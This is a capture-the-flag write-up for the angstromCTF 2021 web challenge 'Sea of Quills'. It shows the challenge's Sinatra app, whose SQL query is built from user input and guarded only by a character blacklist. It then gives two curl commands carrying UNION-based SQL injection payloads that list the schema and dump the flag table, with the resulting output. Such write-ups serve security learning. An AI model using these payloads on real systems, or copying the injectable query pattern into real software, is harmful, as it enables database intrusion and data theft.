ångstromCTF 2021: Sea of Quills

Sea of Quills

Category: Web

70 points

Come check out our finest selection of quills!

app.rb

Author: JoshDaBosh

app.rb

require 'sinatra'
require 'sqlite3'

set :bind, "0.0.0.0"
set :port, 4567

get '/' do
	db = SQLite3::Database.new "quills.db"
	@row = db.execute( "select * from quills" )
	

	erb :index
end

get '/quills' do
	erb :quills	

end


post '/quills' do
	db = SQLite3::Database.new "quills.db"
	cols = params[:cols]
	lim = params[:limit]
	off = params[:offset]
	
	blacklist = ["-", "/", ";", "'", "\""]
	
	blacklist.each { |word|
		if cols.include? word
			return "beep boop sqli detected!"
		end
	}

	
	if !/^[0-9]+$/.match?(lim) || !/^[0-9]+$/.match?(off)
		return "bad, no quills for you!"
	end

	@row = db.execute("select %s from quills limit %s offset %s" % [cols, lim, off])

	p @row

	erb :specific
end

Solution

To look around…

curl 'https://seaofquills.2021.chall.actf.co/quills' --data-raw 'limit=100&offset=0&cols=tbl_name%2Cname%2Csql%20from%20sqlite_master%20union%20select%20url%2Cdesc%2Cname'  

Honey in the output:

<img src="flagtable" class="w3 h3">
				<li class="pb5 pl3">flagtable <ul><li>CREATE TABLE flagtable (
		flag varchar(30)
	)</li></ul></li><br />

Let’s take a look a bit closer…

curl 'https://seaofquills.2021.chall.actf.co/quills' --data-raw 'limit=100&offset=0&cols=flag%2Cflag%2Cflag%20from%20flagtable%20union%20select%20url%2Cdesc%2Cname' 
<img src="actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}" class="w3 h3">
				<li class="pb5 pl3">actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df} <ul><li>actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}</li></ul></li><br />

web

Flag

actf{and_i_was_doing_fine_but_as_you_came_in_i_watch_my_regex_rewrite_f53d98be5199ab7ff81668df}

Privacy Policy
luc © 2021